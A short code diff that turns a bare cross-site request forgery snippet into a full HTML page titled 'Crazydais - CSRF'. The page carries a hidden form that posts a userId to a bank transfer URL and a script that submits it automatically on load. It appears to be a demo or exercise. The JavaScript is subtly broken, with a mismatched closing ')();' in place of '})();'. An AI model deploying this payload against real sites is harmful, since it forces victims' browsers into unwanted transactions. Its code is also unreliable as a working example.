--- a/index.html
+++ b/index.html
@@ -1,10 +1,21 @@
-<form id="csrf" action="http://bank.com/transfer.do" method="POST">
-    <input type="hidden" name="userId" value="123abc"/>
-</form>
+<!doctype HTML>
+<html>
+    <head>
+        <title>Crazydais - CSRF</title>
+    </head>
+    
+    <body>
+        <h1>Crazydais - CSR</h1>
+        
+        <form id="csrf" action="http://bank.com/transfer.do" method="POST">
+            <input type="hidden" name="userId" value="123abc"/>
+        </form>
 
-<script>
-    (function () {
-        var form = document.getElementById("csrf");
-        form.submit();
-    )();
-</script>
+        <script>
+            (function () {
+                var form = document.getElementById("csrf");
+                form.submit();
+            )();
+        </script>
+    </body>
+</html>
